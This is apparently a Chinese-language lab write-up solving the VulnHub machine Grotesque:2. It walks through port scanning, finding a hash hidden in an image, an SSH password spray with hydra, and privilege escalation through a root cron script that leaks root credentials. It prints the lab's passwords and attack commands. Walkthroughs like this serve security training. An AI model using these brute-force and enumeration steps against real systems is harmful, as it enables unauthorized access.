靶机描述

靶机地址:https://www.vulnhub.com/entry/grotesque-2,673/

Description

get flags

difficulty: medium

about vm: do not touch ram allocation. vm needs 4gb of ram. tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.3

靶机

IP地址:192.168.9.10

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

上边那个适合开了少量端口的,可以拿到一些详细信息

运行nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10先让他在一边跑着

由于这个靶机开发的端口太多了

咱们直接用nmap -sT 192.168.9.10 先扫一遍

⬢  Grotesque: 2  nmap -sT 192.168.9.10
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-02 17:50 CST
Nmap scan report for bogon (192.168.9.10)
Host is up (0.0013s latency).
Not shown: 921 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
32/tcp  open  unknown
33/tcp  open  dsp
37/tcp  open  time
42/tcp  open  nameserver
43/tcp  open  whois
49/tcp  open  tacacs
53/tcp  open  domain
70/tcp  open  gopher
79/tcp  open  finger
80/tcp  open  http
81/tcp  open  hosts2-ns
82/tcp  open  xfer
83/tcp  open  mit-ml-dev
84/tcp  open  ctf
85/tcp  open  mit-ml-dev
88/tcp  open  kerberos-sec
89/tcp  open  su-mit-tg
90/tcp  open  dnsix
99/tcp  open  metagram
100/tcp open  newacct
106/tcp open  pop3pw
109/tcp open  pop2
110/tcp open  pop3
111/tcp open  rpcbind
113/tcp open  ident
119/tcp open  nntp
125/tcp open  locus-map
135/tcp open  msrpc
139/tcp open  netbios-ssn
143/tcp open  imap
144/tcp open  news
146/tcp open  iso-tp0
161/tcp open  snmp
163/tcp open  cmip-man
179/tcp open  bgp
199/tcp open  smux
211/tcp open  914c-g
212/tcp open  anet
222/tcp open  rsh-spx
254/tcp open  unknown
255/tcp open  unknown
256/tcp open  fw1-secureremote
259/tcp open  esro-gen
264/tcp open  bgmp
280/tcp open  http-mgmt
301/tcp open  unknown
306/tcp open  unknown
311/tcp open  asip-webadmin
340/tcp open  unknown
366/tcp open  odmr
389/tcp open  ldap
406/tcp open  imsp
407/tcp open  timbuktu
416/tcp open  silverplatter
417/tcp open  onmux
425/tcp open  icad-el
427/tcp open  svrloc
443/tcp open  https
444/tcp open  snpp
445/tcp open  microsoft-ds
458/tcp open  appleqtc
464/tcp open  kpasswd5
465/tcp open  smtps
481/tcp open  dvs
497/tcp open  retrospect
500/tcp open  isakmp
512/tcp open  exec
513/tcp open  login
514/tcp open  shell
515/tcp open  printer
524/tcp open  ncp
541/tcp open  uucp-rlogin
543/tcp open  klogin
544/tcp open  kshell
545/tcp open  ekshell
548/tcp open  afp
554/tcp open  rtsp
555/tcp open  dsf
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 2.49

开放了太多端口了,每个端口还对应了相应的服务

等了一会儿结果出来了

# Nmap 7.92 scan initiated Mon May  2 17:45:06 2022 as: nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10
Nmap scan report for bogon (192.168.9.10)
Host is up (0.00062s latency).
Not shown: 65009 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
31/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
32/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
.
.
.一样的省略了
.
.
80/tcp  open  http    PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_auth-owners: ERROR: Script execution failed (use -d to debug)
81/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
.
.
.一样的省略了
.
.
555/tcp open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_smb2-time: Protocol negotiation failed (SMB2)TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms bogon (192.168.9.10)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  2 17:56:12 2022 -- 1 IP address (1 host up) scanned in 665.77 seconds

可以发现一大堆都是http

2.2枚举漏洞

2.2.1 80 端口分析

由于开放端口太多,咱们照旧先访问80:http://192.168.9.10/

源码也没东西,扫描一下目录

⬢  Grotesque: 2  gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.10 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.10
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,zip,bak,php
[+] Timeout:                 10s
===============================================================
2022/05/02 17:54:55 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.9.10/74c31a13-d670-419d-ab99-a39422881851 => 200 (Length: 412). To continue please exclude the status code, the length or use the --wildcard switch
⬢  Grotesque: 2

很明显,突破口不是这里

2.2.2 全端口分析

根据nmap的扫描结果,可以发现后边的端口都是http

随便拿几个访问,发现页面都是一样的

我决定用wget去把这些页面下载下来看一下文件是否有区别

for i in {23..600};do wget 192.168.9.10:$i -O index$i;done

成功下载来直接运行ls -al | sort进行排序

发现除了258是762字节,其他页面均是412字节

2.2.3 258端口分析

访问:http://192.168.9.10:258/

看到有ssh的几个用户名

atan、raphael、angel、distress、greed、lust

基本可以确定要进行ssh密码暴力破解 但是字典怎么生成呢

然后看到第二行的图片是可以打开的

这个颜色有点不一样,放大看到这里有一串hash值

就这么看,看的很模糊

这就清楚很多了:b6e705ea1249e2bb7b01d7dac91cd0b3

使用 CrackStation 来破解它

得到密码值为solomon1

创建字典users.txt

atan
raphael
angel
distress
greed
lust

使用hydra进行爆破:hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f

⬢  Grotesque: 2  hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-02 18:51:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.10:22/
[22][ssh] host: 192.168.9.10   login: angel   password: solomon1
[STATUS] attack finished for 192.168.9.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-02 18:51:25

成功爆破出用户密码angel ,solomon1

尝试登录

⬢  Grotesque: 2  ssh angel@192.168.9.10
The authenticity of host '192.168.9.10 (192.168.9.10)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.10' (ED25519) to the list of known hosts.
angel@192.168.9.10's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
angel@grotesque:~$

2.3漏洞利用

2.4权限提升

2.4.1 信息收集

查看当前目录下有什么东西

angel@grotesque:~$ ls -al
total 52
drwxr-xr-x 4 angel angel  4096 Mar 27  2021 .
drwxr-xr-x 3 root  root   4096 Mar 27  2021 ..
drwxr-xr-x 2 angel angel 36864 Mar 27  2021 quiet
drwx------ 2 angel angel  4096 Mar 27  2021 .ssh
-r-x------ 1 angel angel  1805 Jan  3  2021 user.txt
angel@grotesque:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█angel@grotesque:~$

成功拿到flag1,同时发现有新目录quiet

查看quiet目录下有什么

不知道是啥东西

上传一个pspy64看一下有什么计划任务

这里我用Filezilla,当然这里也可以用wget啥的

赋予权限,然后运行一下

chmod 777 pspy64
./pspy64

显示脚本write.shcheck.sh在一些固定时间间隔后运行

这里咱们目前没有权限去查看内容

angel@grotesque:/tmp$ cat /root/check.sh
cat: /root/check.sh: Permission denied
angel@grotesque:/tmp$ cat /root/write.sh
cat: /root/write.sh: Permission denied
angel@grotesque:/tmp$

上边咱们发现/home/angel/quiet文件夹中有一些莫名其妙的东西,是不是就是这个脚本写的

尝试删除中的所有文件,看看会发生什么

两个脚本运行后,它会在 quiet 文件夹中再次创建文件,但都是相同的

恩,,,再上传一个linpeas.sh看看吧

它在最近 5 分钟内在/根目录下修改的文件rootcreds.txt

查看其内容

angel@grotesque:/tmp$ cd /
angel@grotesque:/$ ls
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  rootcreds.txt  run  sbin  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
angel@grotesque:/$ cat root
root/          rootcreds.txt
angel@grotesque:/$ cat rootcreds.txt
root credsroot
sweetchild
root credsroot
sweetchild
angel@grotesque:

这个应该就是密码了

尝试切换root

angel@grotesque:/$ su root
Password:
root@grotesque:/# cd /root
root@grotesque:~# ls
check.sh  logdel2  real  real.sh  root.txt  test  upit2.sh  upit.sh  write.sh
root@grotesque:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█congratulations!root@grotesque:~#

成功拿到flag2

回头看看check.sh以及write.sh

root@grotesque:~# cat check.sh
#!/bin/bashcd /home/angel/quiet
if [[ $(ls) == "" ]]; thenecho "root creds" >> /rootcreds.txtecho "" >> /rootcreds.txtecho "root" >> /rootcreds.txtecho "sweetchild" >> /rootcreds.txtchmod 777 /rootcreds.txt
fi
root@grotesque:~# cat write.sh
#!/bin/bashcd /home/angel/quiet
for i in {1..2323}; do echo "quiet" >> $i; done
root@grotesque:~#

check.sh 运行时,在/home/angel/quiet 中执行ls 命令,如果没有文件,则将root creds 写入/目录下名为rootcreds.txt 的文件中,并赋予其读、写和执行权限。

write.sh 创建从 1 到 2323 的文件,并在所有这些文件中写入quiet

总结

又是一个挺有意思的靶机

  1. 信息收集
  2. hydra爆破ssh

靶机渗透练习91-Grotesque:2相关推荐

  1. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  2. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  7. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  8. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  9. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  10. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

最新文章

  1. jQuery的Validate插件
  2. 每日两SQL(4),欢迎交流~
  3. 基于springmvc、ajax,后台连接数据库的增删改查
  4. mysql os.pid_MySQL在OS El Capitan的配置[PID file error]
  5. subsonic 配置及使用
  6. Fish for mac安装 fish+on my fish ---(powerline主题)美化
  7. autojs今日头条急速脚本
  8. 最新版网站推广完全手册(2007年)!
  9. matlab安装自行下载的工具箱
  10. 位图上下文 裁剪图片成一个圆形的头像
  11. 5分钟入门MP4文件格式-mp4的ftyp
  12. 大数字加法(C语言实现)
  13. “The file being opened for reading does not exist“-HyperMesh
  14. 如何把照片制作成带音乐的影集相册?动感特效,简单实用!
  15. 其他:鼠标滚轴坏了如何修?
  16. 冬季药膳食疗强烈推荐
  17. 基于QT的游戏修改器
  18. 如何下载并安装Firebug插件
  19. 减少博客吮吸的32种方法(博客世界2010)
  20. 一个领导发给下属的邮件,醍醐灌顶!

热门文章

  1. 计算机网络4 网络层
  2. 土地利用覆被变化的概念_土地利用和覆被变化(LUCC)过程及效应
  3. 各种台式计算机计量单位相同吗,计算机常见计量单位解析
  4. Go语言爱好者周刊:第 142 期
  5. keras 香草编码器_用香草javascript遍历dom
  6. fire.fire_如何将第三方控制器与Fire TV和Fire TV Stick配对
  7. Python数据分析笔记----第六章pandas文件操作
  8. openGauss+KeepAlived(故障转移)
  9. 【毕业设计】深度学习昆虫识别系统 - 图像识别 opencv python
  10. c语言中编译解释,C语言既可以编译执行又可以解释执行吗? 编译执行怎么解释? 解释执行又怎么解释?...